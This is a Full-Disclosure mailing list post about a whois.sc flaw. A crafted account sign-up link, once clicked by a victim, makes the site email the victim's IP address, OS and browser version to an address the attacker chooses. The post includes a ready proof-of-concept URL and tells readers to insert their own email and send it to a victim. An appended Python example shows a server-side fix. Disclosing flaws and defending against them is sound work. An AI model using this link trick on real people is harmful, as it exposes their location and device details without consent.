
[Full-disclosure] whois.sc not-big-deal hole (2nd post)



I just forgot to mention in the previous post that after the victim
clicks on the specially-crafted link, the attacker should be able to
receive an account sign-up email with the following information about
the victim (located at the bottom of the email body):

- IP Address
- Operating system version
- Web browser version


The bottom of the email looks like this (some information has been hidden):

---------------------------------------------------
NOTE: You received this message because someone from
X.X.X.X(Mozilla/X.X (Windows; U; Windows NT X.X; en-US; rv:X.X.X)
Gecko/2005XXXX Firefox/X.X.X)
requested an account for this email address. If you
did not request this account please ignore this message
and you will not be contacted again.
---------------------------------------------------



PoC:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40gmail.com


Replace "attacker%40gmail.com" in the previous link with your own
email address (e.g.: myself%40gmail.com) and send it to the victim.

Note: the only limitation of this "trick" is that the attacker needs
to use a different email address for each attack. This is because
whois.sc will set the account activation status to "pending" after
requesting the account activation for the first time.



Regards,

pagvac
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
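
A server-side mitigation for the behaviour described in this post, as an added example that is not part of the original message and is not whois.sc's code: the sign-up action is refused on GET, requires a session-bound token, and the notification mail no longer carries the requester's IP address or User-Agent. The handler name, the `csrf_token` field, the session id and the in-memory audit log are hypothetical; only the `action` and `email` parameters come from the post.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # assumption: per-deployment secret
AUDIT_LOG = []                        # stand-in for server-side logging


def issue_csrf_token(session_id: str) -> str:
    """Token embedded in the real sign-up form, bound to the visitor's session."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def handle_signup(method, session_id, params, client):
    """Return (http_status, email_body); email_body is None if no mail is sent."""
    # 1. Creating an account changes state: refuse GET so a link alone cannot do it.
    if method != "POST":
        return 405, None
    # 2. Require the token issued with this session's form (constant-time compare).
    supplied = str(params.get("csrf_token", ""))
    expected = issue_csrf_token(session_id)
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, None
    # 3. Keep the requester's IP and User-Agent in server logs only; the owner of
    #    the submitted address gets no details about whoever sent the request.
    AUDIT_LOG.append((params.get("email", ""), client["ip"], client["user_agent"]))
    body = ("Someone requested an account for this email address. If you did not "
            "request this account please ignore this message.")
    return 200, body


if __name__ == "__main__":
    # Constructed sample request: documentation IP and a made-up User-Agent.
    client = {"ip": "192.0.2.10", "user_agent": "ExampleBrowser/1.0"}
    link = {"action": "newaccount", "email": "someone@example.com"}
    print(handle_signup("GET", "sess-1", link, client))    # (405, None)
    form = dict(link, csrf_token=issue_csrf_token("sess-1"))
    print(handle_signup("POST", "sess-1", form, client)[0])  # 200
```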